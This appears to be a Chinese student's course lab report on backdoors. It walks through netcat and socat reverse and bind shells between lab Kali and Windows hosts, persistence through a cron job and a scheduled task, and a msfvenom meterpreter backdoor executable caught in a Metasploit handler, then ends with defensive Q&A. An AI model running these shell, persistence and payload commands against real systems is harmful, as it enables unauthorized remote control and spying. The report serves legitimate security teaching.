一、实验内容
1.使用netcat获取主机操作Shell,cron启动
2.使用socat获取主机操作Shell, 任务计划启动
3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝
二、实验步骤
2.1 使用netcat获取主机操作Shell,cron启动
2.1.1 windows下获得一个linux shell
step1. 在Windows中使用ipconfig查看本机ip地址
step2. 在Windows中使用ncat.exe程序打开监听
ncat.exe -l -p 2318step3. 在kali中反弹连接Windows
ncat 192.168.88.1 2318 -e /bin/sh
step4. Windows成功获得kali的shell,并使用ls命令查看当前目录
2.1.2 Linux 下获得Windows的cmd程序,cron启动
step1.
在Windows系统下,监听2318端口
ncat.exe -l -p 2318step2.在Kali环境下,用crontab -e指令编辑一条定时任务,选择编辑器时选择3
step3.在最后一行添加
10 * * * * /bin/netcat 192.168.88.1 2318 -e /bin/sh //在每小时的第10分钟反向连接Windows主机的2318端口
step4.时间到达10分时,如下图所示:
2.2 使用socat获取主机操作Shell, 任务计划启动
2.2.1 Linux 下获得Windows的cmd程序
step1.在kali中使用ifconfig查看IP
step2.在kali中打开监听
nc -l -p 2318step3.在Windows中反弹连接kali
ncat.exe -e cmd.exe 192.168.187.128 2318
step4.kali成功获得Windows的命令提示,并使用dir命令查看当前目录
2.2.2 使用socat获取主机操作Shell, 任务计划启动
step1.在“任务计划程序”中“创建任务”
step2.填写任务名
step3.填写触发器
step4.填写操作,导入socat.exe的路径,并添加参数:tcp-listen:2318 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口2318,同时把cmd.exe的stderr重定向到stdout上)
step5.到达约定时间后,在Kali环境下输入指令
socat -tcp:192.168.88.1:2318此时可以发现已经成功获得了WINDOWSd的cmd shell
2.3 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
step1.在Kali上执行指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.187.128 LPORT=2318 -f exe > 20162318_backdoor.exe
step2.在Windows下执行
ncat.exe -lv 2318 > 20162318_backdoor.exe
step3.在Linux中执行
nc 192.168.88.1 2318 < 20162318_backdoor.exe
step4.在Kali上输入msfconsole指令进入msf控制台
root@20162318:~# msfconsolestep5.依次输入
use exploit/multi/handler //使用监听模块,设置payloadset payload windows/meterpreter/reverse_tcp /使用和生成后门程序时相同的payloadset LHOST 192.168.187.128 //设置ipset LPORT 2318 //设置端口
step6.使用exploit开始监听
step7.运行Windows下的后门程序
step8.Linux获得Windows主机的连接,并且得到了远程控制的shell
2.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
step1.完成2.3的全部操作
step2.使用screenshot指令进行截屏
step3.尝试提权和获取摄像头权限失败
三、基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
当我们打开一个钓鱼邮件时,如果后台自动下载并安装木马程序,自动运行,因此在系统留下后门。
下载游戏修改器也可能会有后门
(2)例举你知道的后门如何启动起来(win及linux)的方式?
打开一些游戏的作弊器
通过修改注册表设置为开机自启动
(3)Meterpreter有哪些给你映像深刻的功能
截取受害主机的图片,获取录音等等
(4)如何发现自己有系统有没有被安装后门?
定期使用杀毒软件进行杀毒
四、实验总结与体会
本次实验使我明白了后门的可怕之处,所以以后要在正规网站下载正规软件,不下载游戏外挂之类可能会藏有后门的软件,其次是定期使用杀毒软件进行杀毒,防止存在有后门软件的软件的存在。